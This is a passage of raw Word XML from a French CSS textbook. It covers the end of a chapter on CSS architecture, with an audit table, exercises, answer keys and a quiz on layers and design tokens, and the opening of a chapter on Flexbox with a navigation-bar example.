                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Simplifier</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="344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Classes orphelines</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="245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&gt; 10 %</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="31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Purger</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3442"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Feuilles non utilisées</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2458"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>&gt; 0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3114"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Supprimer</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REVUE TRIMESTRIELLE DU CSS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Lister les fichiers et leur taille.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Supprimer les règles non utilisées (vérification dans le HTML).</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Regrouper les valeurs en jetons.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Vérifier l'ordre des couches.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Documenter les conventions dans le README.</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architecture CSS limite le risque de régression.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Cinq couches : jetons, base, mise en page, composants, utilitaires.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couche ne dépend que des couches inférieures.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Les </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>@layer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> rendent l'ordre de priorité explicite.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nom décrit un rôle, jamais une apparence.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jetons centralisent les décisions de conception.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variantes explicites remplacent les surcharges contextuelles.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>L'architecture est posée. Place aux mises en page modernes, en commençant par Flexbox.</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17.1 — Restructurer un projet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">   ORGANISATION</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Un projet contient un unique </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>style.css</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> de 2 400 lignes.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Proposez un découpage en cinq dossiers.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Définissez l'ordre d'import et les couches.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Listez trois risques de la migration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 17.2 — Créer un jeu de jetons complet</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Définissez les jetons d'un site de formation : couleurs, espacements, typographie, rayons, ombres, durées.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Limitez-vous à huit espacements.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Utilisez une échelle typographique.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Documentez chaque famille en commentaire.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 17.3 — Auditer une feuille de style</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">   ANALYSE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Analysez la feuille d'un site existant.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 xml:space="preserve">Comptez les </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>!important</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et les identifiants utilisés pour le style.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Repérez les couleurs codées en dur.</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Proposez un plan de refonte en trois étapes.</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17.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Découpage : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>base/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>jetons/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>mise-en-page/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>composants/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>utilitaires/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, avec un </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>main.css</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> qui importe dans l'ordre.</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@layer reset, jetons, base, mise-en-page, composants, utilitaires;</w:t>
        <w:br/>
        <w:t>@import url("base/_reset.css") layer(reset);</w:t>
        <w:br/>
        <w:t>@import url("jetons/_couleurs.css") layer(jetons);</w:t>
        <w:br/>
        <w:t>/* ... */</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Trois risques : règles perdues lors du déplacement, ordre modifié qui change la cascade, et anciennes classes encore référencées dans le HTML. La migration doit être progressive et versionnée.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 17.2</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:root {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  /* Couleurs : primaire, neutres, états */</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --primaire: #0f2e4c; --primaire-clair: #274b6d;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --texte: #1f2933; --texte-doux: #52606d;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --fond: #fff; --fond-alt: #f4f7f9;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --succes: #2f7d5b; --alerte: #a63a32; --accent: #e0a21b;</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  /* Espacements : échelle de 4 px */</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --e1: .25rem; --e2: .5rem; --e3: .75rem; --e4: 1rem;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --e6: 1.5rem; --e8: 2rem; --e12: 3rem; --e16: 4rem;</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  /* Typographie : rapport 1,25 */</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --t-s: .875rem; --t-m: 1.0625rem; --t-l: 1.5rem;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --t-xl: 2rem; --t-xxl: 2.75rem;</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  /* Rayons et ombres */</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --r-s: 4px; --r-m: 8px; --r-pilule: 999px;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --ombre-1: 0 1px 2px rgb(15 46 76 / 8%);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --ombre-2: 0 8px 24px rgb(15 46 76 / 12%);</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  /* Mouvement */</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --d-rapide: 150ms; --d-normale: 250ms;</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Huit espacements couvrent les besoins courants ; au-delà, la valeur arbitraire revient.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une échelle typographique évite les tailles incohérentes et facilite les ajustements globaux.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 17.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Plus de trois </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>!important</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> indiquent un conflit de spécificité non résolu ; les identifiants de style empêchent la réutilisation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les couleurs en dur (plus de dix teintes différentes) révèlent l'absence de palette : elles doivent devenir des jetons.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Plan : 1) extraire les jetons sans rien changer visuellement ; 2) migrer les composants vers ces jetons ; 3) supprimer les règles obsolètes et réduire la spécificité.</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Combien de couches propose l'architecture décrite dans ce chapitre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Trois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Quatre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Cinq</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Sept</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 xml:space="preserve">Que fait </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>@layer reset, jetons, base;</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Il importe trois fichiers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Il déclare l'ordre de priorité des couches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Il crée trois variables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Il active le mode sombre</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Quel nom de classe est le plus robuste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.bleu</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.colonne-gauche</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.carte__titre</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.grand-texte</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 xml:space="preserve">Pourquoi éviter </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.sidebar .carte { ... }</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C'est trop long</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 composant devient dépendant de son contexte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Cela empêche le responsive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Cela casse la cascade</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Quel outil repère les classes CSS non utilisées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 minifieur</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PurgeCSS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Un préprocesseur</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Un validateur HTML</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C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Jetons, base, mise en page, composants, utilitaires : cinq couches aux frontières explicites.</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L'ordre déclaré fixe la priorité : les couches suivantes l'emportent sur les précédentes, indépendamment du nombre de sélecteurs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>3. C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Un nom de rôle (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>carte__titre</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>) reste juste si la couleur, la position ou la taille changent.</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La surcharge contextuelle rend le composant imprévisible ; une variante explicite est préférable.</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PurgeCSS analyse le HTML et retire les règles dont les sélecteurs n'apparaissent nulle part.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>18. Flexbox : aligner sur un axe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Une dimension, deux axes, six propriétés : la mise en page du quotidien enfin maîtrisée.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Durée de travail : 3 h 00 · Niveau : Intermédiaire · Prérequis : chapitre 17</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Distinguer axe principal et axe secondaire.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Aligner et répartir des éléments sans marge ni positionnement.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Contrôler le rétrécissement et l'expansion des enfants.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Construire des barres, cartes, centrages et étiquettes.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Reconnaître les cas où Flexbox n'est pas la bonne réponse.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>18.1 Le modèle mental</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Flexbox organise les enfants d'un conteneur le long d'un </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>axe principal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Le sens de cet axe dépend de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>flex-direction</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> : horizontale par défaut, verticale si l'on choisit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>column</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>. L'axe perpendiculaire est l'axe secondaire.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="2540000"/>
            <wp:docPr id="27" name="Picture 27"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f25.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId45"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="2540000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.25 — Deux axes, deux logiques</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Trois propriétés suffisent à une barre de navigation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.barre {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  display: flex;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  flex-direction: row;        /* axe principal horizontal */</w:t>
        <w:br/>
        <w:t xml:space="preserve">  justify-content: space-between;  /* répartition sur l'axe principal */</w:t>
        <w:br/>
        <w:t xml:space="preserve">  align-items: center;        /* alignement sur l'axe secondaire */</w:t>
        <w:br/>
        <w:t xml:space="preserve">  gap: 1rem;</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.59 — Dix propriétés essentielles de Flexbox</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55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Propriété</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="204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Conteneur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="442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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2551"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>flex-direction</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2041"/>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4422"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Sens de l'axe principal</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
